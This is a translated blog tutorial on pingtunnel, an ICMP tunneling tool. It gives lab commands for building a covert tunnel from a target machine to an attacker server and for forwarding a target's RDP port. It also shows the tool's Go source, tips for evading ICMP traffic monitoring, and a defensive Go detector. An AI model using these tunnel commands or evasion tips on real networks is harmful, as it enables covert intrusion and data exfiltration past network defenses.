Intranet penetration series: pingtunnel, an intranet tunnel
2022-04-23 08:01:00 【Fish in Siyuan Lake】
Preface
This article looks at pingtunnel, a tool for building ICMP tunnels.
github: https://github.com/esrrhs/pingtunnel
I. Overview
1. Introduction
Continuously updated, written in Go by a Tencent engineer; a cross-platform tool that disguises tcp/udp/sock5 traffic as ICMP and forwards it.
Prerequisites:
- The target machine (client) can ping outward
- The target machine may need administrator privileges
- Windows needs WinPcap installed
2. Principle
For how ICMP tunnels work, see: Intranet penetration series: ICMP tunnels of intranet tunnels
3. Usage
(1) Direct connection out of the network
Attacking machine (server side): start the tunnel and disable the system's own ping reply
sudo ./pingtunnel -type server
echo 1 >/proc/sys/net/ipv4/icmp_echo_ignore_all
Target machine (client)
# forward sock5
./pingtunnel -type client -l :4455 -s www.yourserver.com -sock5 1
# forward tcp
./pingtunnel -type client -l :4455 -s www.yourserver.com -t www.yourserver.com:4455 -tcp 1
# forward udp
./pingtunnel -type client -l :4455 -s www.yourserver.com -t www.yourserver.com:4455
(2) Out through a springboard
Springboard machine
./pingtunnel -x 123456 # set the password
Attacking machine
./pingtunnel -p <springboard machine ip> -lp 1080 -da <target machine ip> -dp 3389 -x 123456
-p: specify the IP of the other end of the ICMP tunnel
-lp: specify the local listening port
-da: specify the IP of the target machine to forward to
-dp: specify the port of the target machine to forward to
-x: specify the connection password
II. Practice
1. Scenario
Attacking machine (server side): kali 192.168.10.128
Target machine (client): ubuntu 192.168.10.129
The target can ping the attacking machine
2. Build the tunnel
(1) Attacking machine
echo 1 >/proc/sys/net/ipv4/icmp_echo_ignore_all # disable the system's own ping reply (optional)
[sudo] ./pingtunnel -type server -key 123456 # set the password
(2) Target machine
./pingtunnel -type client -l :8888 -s 192.168.10.128 -t 192.168.10.128:7777 -tcp 1 -key 123456
(3) nc
At this point the tunnel is established.
You can then move on to the next step, for example nc.
Target machine (screenshot)
The attacking machine receives the message (screenshot)
3. Capture packets and take a look
Heartbeat packets when the connection is established, and ARP resolution (screenshot)
Packets during the nc command (screenshot)
III. Exploration
1. Source code analysis
(1) main.go
Mostly argument handling: it starts the server or the client, and then there is a country filter that can be ignored (the library it pulls in for that is rather large)
package main

import (
	"flag"
	"fmt"
	"github.com/esrrhs/go-engine/src/common"
	"github.com/esrrhs/go-engine/src/geoip"
	"github.com/esrrhs/go-engine/src/loggo"
	"github.com/esrrhs/go-engine/src/pingtunnel"
	"net"
	"net/http"
	_ "net/http/pprof"
	"strconv"
	"time"
)

var usage = `
By forging ping, the tcp/udp/sock5 traffic is forwarded to the destination server through the remote server. Used to break certain operators to block TCP/UDP traffic.

Usage:

// server
pingtunnel -type server

// client, Forward udp
pingtunnel -type client -l LOCAL_IP:4455 -s SERVER_IP -t SERVER_IP:4455

// client, Forward tcp
pingtunnel -type client -l LOCAL_IP:4455 -s SERVER_IP -t SERVER_IP:4455 -tcp 1

// client, Forward sock5, implicitly open tcp, so no target server is needed
pingtunnel -type client -l LOCAL_IP:4455 -s SERVER_IP -sock5 1

-type       client or server

server param:

-key        Set password, default 0
-nolog      Do not write log files, only print standard output, default 0 is off
-noprint    Do not print standard output, default 0 is off
-loglevel   log level, default is info
-maxconn    the max num of connections, default 0 is no limit
-maxprt     max process thread in server, default 100
-maxprb     max process thread's buffer in server, default 1000
-conntt     The timeout period for the server to initiate a connection to the destination address. The default is 1000ms.

client param:

-l          Local address, traffic sent to this port will be forwarded to the server
-s          The address of the server, the traffic will be forwarded to this server through the tunnel
-t          Destination address forwarded by the remote server, traffic will be forwarded to this address
-timeout    The time when the local record connection timed out, in seconds, 60 seconds by default
-key        Set password, default 0
-tcp        Set the switch to forward tcp, the default is 0
-tcp_bs     Tcp send and receive buffer size, default 1MB
-tcp_mw     The maximum window of tcp, the default is 20000
-tcp_rst    Tcp timeout resend time, default 400ms
-tcp_gz     Tcp will compress data when the packet exceeds this size, 0 means no compression, default 0
-tcp_stat   Print tcp connection statistic, default 0 is off
-nolog      Do not write log files, only print standard output, default 0 is off
-noprint    Do not print standard output, default 0 is off
-loglevel   log level, default is info
-sock5      Turn on sock5 forwarding, default 0 is off
-profile    Enable performance detection on the specified port. The default 0 is not enabled.
-s5filter   Set the forwarding filter in the sock5 mode. The default is full forwarding. For example, setting the CN indicates that the Chinese address is not forwarded.
-s5ftfile   The data file in sock5 filter mode, the default reading of the current directory GeoLite2-Country.mmdb
`

func main() {
	defer common.CrashLog()

	t := flag.String("type", "", "client or server")
	listen := flag.String("l", "", "listen addr")
	target := flag.String("t", "", "target addr")
	server := flag.String("s", "", "server addr")
	timeout := flag.Int("timeout", 60, "conn timeout")
	key := flag.Int("key", 0, "key")
	tcpmode := flag.Int("tcp", 0, "tcp mode")
	tcpmode_buffersize := flag.Int("tcp_bs", 1*1024*1024, "tcp mode buffer size")
	tcpmode_maxwin := flag.Int("tcp_mw", 20000, "tcp mode max win")
	tcpmode_resend_timems := flag.Int("tcp_rst", 400, "tcp mode resend time ms")
	tcpmode_compress := flag.Int("tcp_gz", 0, "tcp data compress")
	nolog := flag.Int("nolog", 0, "write log file")
	noprint := flag.Int("noprint", 0, "print stdout")
	tcpmode_stat := flag.Int("tcp_stat", 0, "print tcp stat")
	loglevel := flag.String("loglevel", "info", "log level")
	open_sock5 := flag.Int("sock5", 0, "sock5 mode")
	maxconn := flag.Int("maxconn", 0, "max num of connections")
	max_process_thread := flag.Int("maxprt", 100, "max process thread in server")
	max_process_buffer := flag.Int("maxprb", 1000, "max process thread's buffer in server")
	profile := flag.Int("profile", 0, "open profile")
	conntt := flag.Int("conntt", 1000, "the connect call's timeout")
	s5filter := flag.String("s5filter", "", "sock5 filter")
	s5ftfile := flag.String("s5ftfile", "GeoLite2-Country.mmdb", "sock5 filter file")

	flag.Usage = func() {
		fmt.Printf(usage)
	}

	flag.Parse()

	if *t != "client" && *t != "server" {
		flag.Usage()
		return
	}
	if *t == "client" {
		if len(*listen) == 0 || len(*server) == 0 {
			flag.Usage()
			return
		}
		if *open_sock5 == 0 && len(*target) == 0 {
			flag.Usage()
			return
		}
		if *open_sock5 != 0 {
			*tcpmode = 1
		}
	}
	if *tcpmode_maxwin*10 > pingtunnel.FRAME_MAX_ID {
		fmt.Println("set tcp win too big, max = " + strconv.Itoa(pingtunnel.FRAME_MAX_ID/10))
		return
	}

	// Logging
	level := loggo.LEVEL_INFO
	if loggo.NameToLevel(*loglevel) >= 0 {
		level = loggo.NameToLevel(*loglevel)
	}
	loggo.Ini(loggo.Config{
		Level:     level,
		Prefix:    "pingtunnel",
		MaxDay:    3,
		NoLogFile: *nolog > 0,
		NoPrint:   *noprint > 0,
	})
	loggo.Info("start...")
	loggo.Info("key %d", *key)

	if *t == "server" {
		s, err := pingtunnel.NewServer(*key, *maxconn, *max_process_thread, *max_process_buffer, *conntt)
		if err != nil {
			loggo.Error("ERROR: %s", err.Error())
			return
		}
		loggo.Info("Server start")
		err = s.Run()
		if err != nil {
			loggo.Error("Run ERROR: %s", err.Error())
			return
		}
	} else if *t == "client" {
		loggo.Info("type %s", *t)
		loggo.Info("listen %s", *listen)
		loggo.Info("server %s", *server)
		loggo.Info("target %s", *target)

		if *tcpmode == 0 {
			*tcpmode_buffersize = 0
			*tcpmode_maxwin = 0
			*tcpmode_resend_timems = 0
			*tcpmode_compress = 0
			*tcpmode_stat = 0
		}

		// Country filter; can be ignored if you are not using the tool to get past the firewall
		if len(*s5filter) > 0 {
			err := geoip.Load(*s5ftfile)
			if err != nil {
				loggo.Error("Load Sock5 ip file ERROR: %s", err.Error())
				return
			}
		}
		filter := func(addr string) bool {
			if len(*s5filter) <= 0 {
				return true
			}
			taddr, err := net.ResolveTCPAddr("tcp", addr)
			if err != nil {
				return false
			}
			ret, err := geoip.GetCountryIsoCode(taddr.IP.String())
			if err != nil {
				return false
			}
			if len(ret) <= 0 {
				return false
			}
			return ret != *s5filter
		}

		c, err := pingtunnel.NewClient(*listen, *server, *target, *timeout, *key,
			*tcpmode, *tcpmode_buffersize, *tcpmode_maxwin, *tcpmode_resend_timems, *tcpmode_compress,
			*tcpmode_stat, *open_sock5, *maxconn, &filter)
		if err != nil {
			loggo.Error("ERROR: %s", err.Error())
			return
		}
		loggo.Info("Client Listen %s (%s) Server %s (%s) TargetPort %s:", c.Addr(), c.IPAddr(),
			c.ServerAddr(), c.ServerIPAddr(), c.TargetAddr())
		err = c.Run()
		if err != nil {
			loggo.Error("Run ERROR: %s", err.Error())
			return
		}
	} else {
		return
	}

	if *profile > 0 {
		go http.ListenAndServe("0.0.0.0:"+strconv.Itoa(*profile), nil)
	}

	for {
		time.Sleep(time.Hour)
	}
}
(2) pingtunnel.go
ICMP packet construction, sending and receiving. The ICMP and IP packet types come straight from the imported net libraries; sending and receiving are mostly filling in the payload and handling a few errors
package pingtunnel

import (
	"encoding/binary"
	"github.com/esrrhs/go-engine/src/common"
	"github.com/esrrhs/go-engine/src/loggo"
	"github.com/golang/protobuf/proto"
	"golang.org/x/net/icmp"
	"golang.org/x/net/ipv4"
	"net"
	"sync"
	"time"
)

func sendICMP(id int, sequence int, conn icmp.PacketConn, server *net.IPAddr, target string,
	connId string, msgType uint32, data []byte, sproto int, rproto int, key int,
	tcpmode int, tcpmode_buffer_size int, tcpmode_maxwin int, tcpmode_resend_time int, tcpmode_compress int, tcpmode_stat int,
	timeout int) {

	// The tunnel's own message, serialised with protobuf and carried as the echo payload
	m := &MyMsg{
		Id:                  connId,
		Type:                (int32)(msgType),
		Target:              target,
		Data:                data,
		Rproto:              (int32)(rproto),
		Key:                 (int32)(key),
		Tcpmode:             (int32)(tcpmode),
		TcpmodeBuffersize:   (int32)(tcpmode_buffer_size),
		TcpmodeMaxwin:       (int32)(tcpmode_maxwin),
		TcpmodeResendTimems: (int32)(tcpmode_resend_time),
		TcpmodeCompress:     (int32)(tcpmode_compress),
		TcpmodeStat:         (int32)(tcpmode_stat),
		Timeout:             (int32)(timeout),
		Magic:               (int32)(MyMsg_MAGIC),
	}

	mb, err := proto.Marshal(m)
	if err != nil {
		loggo.Error("sendICMP Marshal MyMsg error %s %s", server.String(), err)
		return
	}

	body := &icmp.Echo{
		ID:   id,
		Seq:  sequence,
		Data: mb,
	}

	msg := &icmp.Message{
		Type: (ipv4.ICMPType)(sproto),
		Code: 0,
		Body: body,
	}

	bytes, err := msg.Marshal(nil)
	if err != nil {
		loggo.Error("sendICMP Marshal error %s %s", server.String(), err)
		return
	}

	conn.WriteTo(bytes, server)
}

func recvICMP(workResultLock *sync.WaitGroup, exit *bool, conn icmp.PacketConn, recv chan<- *Packet) {
	defer common.CrashLog()

	(*workResultLock).Add(1)
	defer (*workResultLock).Done()

	bytes := make([]byte, 10240)
	for !*exit {
		conn.SetReadDeadline(time.Now().Add(time.Millisecond * 100))
		n, srcaddr, err := conn.ReadFrom(bytes)

		if err != nil {
			nerr, ok := err.(net.Error)
			if !ok || !nerr.Timeout() {
				loggo.Info("Error read icmp message %s", err)
				continue
			}
		}

		if n <= 0 {
			continue
		}

		// ICMP echo header: identifier at bytes 4:6, sequence at 6:8, payload from byte 8
		echoId := int(binary.BigEndian.Uint16(bytes[4:6]))
		echoSeq := int(binary.BigEndian.Uint16(bytes[6:8]))

		my := &MyMsg{}
		err = proto.Unmarshal(bytes[8:n], my)
		if err != nil {
			loggo.Debug("Unmarshal MyMsg error: %s", err)
			continue
		}

		// Packets that do not carry the tunnel's magic value are dropped
		if my.Magic != (int32)(MyMsg_MAGIC) {
			loggo.Debug("processPacket data invalid %s", my.Id)
			continue
		}

		recv <- &Packet{
			my:      my,
			src:     srcaddr.(*net.IPAddr),
			echoId:  echoId,
			echoSeq: echoSeq,
		}
	}
}

type Packet struct {
	my      *MyMsg
	src     *net.IPAddr
	echoId  int
	echoSeq int
}

const (
	FRAME_MAX_SIZE int = 888
	FRAME_MAX_ID   int = 1000000
)
(3) client.go
More than 800 lines... mainly because it has to support TCP, UDP and SOCKS5
(4) server.go
Likewise more than 800 lines..
2. Detection and bypass
(1) Abnormal number of ICMP packets
As the figure shows, during the nc session there are 10 packets per second
Consider setting the interval between packets to that of a normal ping
Or blend in with the normal traffic
(2) Abnormal ICMP packet length
As the figure shows, when nc transmits data the packet length is abnormal
Consider splitting the content, limiting the length, and reassembling it after receipt
(3) Payload content
Payload content detection cannot be evaded
Normal ping commands:
On Windows, ping sends by default: abcdefghijklmnopqrstuvwabcdefghi, 32 bytes in total
On Linux, ping sends 48 bytes by default; the first 8 bytes are a timestamp and the rest is fixed, with the content !"#$%&'()*+,-./01234567
Encryption and obfuscation: I do not know how effective they are, it depends on the rules?
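The three observations above translate directly into a baseline check on the defender's side. The following is an added example, not from the article, written in Go over constructed capture records: it flags a source that sends more than maxPerSecond echo requests within one second, a payload length other than the 32-byte Windows or 48-byte Linux default, and payload bytes that match neither default. The addresses reuse the lab above but the traffic is made up; Record, Finding, Analyze and SampleRecords are names chosen for this example. The last host in the sample keeps a ping-like rate and the Linux length and is still caught by the content check, which is the point made in (3).

```go
package main

import (
	"bytes"
	"fmt"
	"sort"
)

// Record is one ICMP echo request as it would be read out of a capture:
// the sender, a timestamp in seconds and the echo payload (the bytes after
// the 8-byte ICMP header).
type Record struct {
	Src     string
	Time    float64
	Payload []byte
}

// Finding is one detection for a source address.
type Finding struct {
	Src    string
	Reason string
}

// Baselines for the two default ping payloads described in the text.
var (
	// Windows ping sends this 32-byte string.
	windowsPayload = []byte("abcdefghijklmnopqrstuvwabcdefghi")
	// Linux ping sends a timestamp followed by the fixed bytes 0x10..0x37, whose
	// printable tail is !"#$%&'()*+,-./01234567; the text gives the whole payload
	// as 48 bytes (8 timestamp bytes + 40 pattern bytes).
	linuxPattern = linuxFill()
)

func linuxFill() []byte {
	p := make([]byte, 0, 0x38-0x10)
	for b := byte(0x10); b <= 0x37; b++ {
		p = append(p, b)
	}
	return p
}

// baselineLengths are the only payload sizes a default ping produces.
var baselineLengths = map[int]bool{len(windowsPayload): true, 48: true}

// payloadLooksDefault reports whether p is what a stock Windows or Linux ping
// would carry (the Linux timestamp prefix varies, so only the fixed tail is compared).
func payloadLooksDefault(p []byte) bool {
	if bytes.Equal(p, windowsPayload) {
		return true
	}
	return len(p) == 48 && bytes.HasSuffix(p, linuxPattern)
}

// Analyze applies the three checks from the text to a batch of records:
// too many echo requests from one source within a one-second window, a payload
// length no default ping produces, and payload content that matches neither
// default. One finding per (source, reason), sorted for stable output.
func Analyze(records []Record, maxPerSecond int) []Finding {
	perSecond := map[string]map[int64]int{}
	seen := map[Finding]bool{}
	add := func(src, reason string) { seen[Finding{Src: src, Reason: reason}] = true }

	for _, r := range records {
		sec := int64(r.Time)
		if perSecond[r.Src] == nil {
			perSecond[r.Src] = map[int64]int{}
		}
		perSecond[r.Src][sec]++
		if !baselineLengths[len(r.Payload)] {
			add(r.Src, fmt.Sprintf("payload length %d is not a default ping size", len(r.Payload)))
		}
		if !payloadLooksDefault(r.Payload) {
			add(r.Src, "payload content does not match a default ping")
		}
	}
	for src, buckets := range perSecond {
		for sec, n := range buckets {
			if n > maxPerSecond {
				add(src, fmt.Sprintf("%d echo requests in second %d (limit %d)", n, sec, maxPerSecond))
			}
		}
	}

	out := make([]Finding, 0, len(seen))
	for f := range seen {
		out = append(out, f)
	}
	sort.Slice(out, func(i, j int) bool {
		if out[i].Src != out[j].Src {
			return out[i].Src < out[j].Src
		}
		return out[i].Reason < out[j].Reason
	})
	return out
}

// SampleRecords is a constructed capture: a Linux and a Windows host pinging
// once per second, the tunnel client from the lab pushing a burst of large
// packets, and a slowed-down tunnel that keeps the Linux length but not the content.
func SampleRecords() []Record {
	var recs []Record
	linuxPayload := append(bytes.Repeat([]byte{0}, 8), linuxPattern...) // 8 timestamp bytes + pattern
	for i := 0; i < 3; i++ {
		t := float64(i)
		recs = append(recs,
			Record{"192.168.10.50", t + 0.1, linuxPayload},
			Record{"192.168.10.51", t + 0.2, windowsPayload},
			Record{"192.168.10.52", t + 0.3, bytes.Repeat([]byte{0xaa}, 48)},
		)
	}
	for i := 0; i < 10; i++ {
		recs = append(recs, Record{"192.168.10.129", 1 + float64(i)/10, bytes.Repeat([]byte{0x0a}, 200)})
	}
	return recs
}

func main() {
	for _, f := range Analyze(SampleRecords(), 5) {
		fmt.Printf("%-16s %s\n", f.Src, f.Reason)
	}
}
```

The rate limit is a parameter because a sensible value depends on the environment; the content rule has no parameter, which is why it is the hardest of the three to get around. A real deployment would feed Analyze from a capture library instead of SampleRecords and add the per-OS payload variants actually seen on the network to the baseline.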
Conclusion
An ICMP tunnel written in Go; somewhat more capable than the other ICMP tunnels
Copyright notice
This article was written by [Fish in Siyuan Lake]; please include the original link when reposting, thanks
https://yzsam.com/2022/04/202204230628265604.html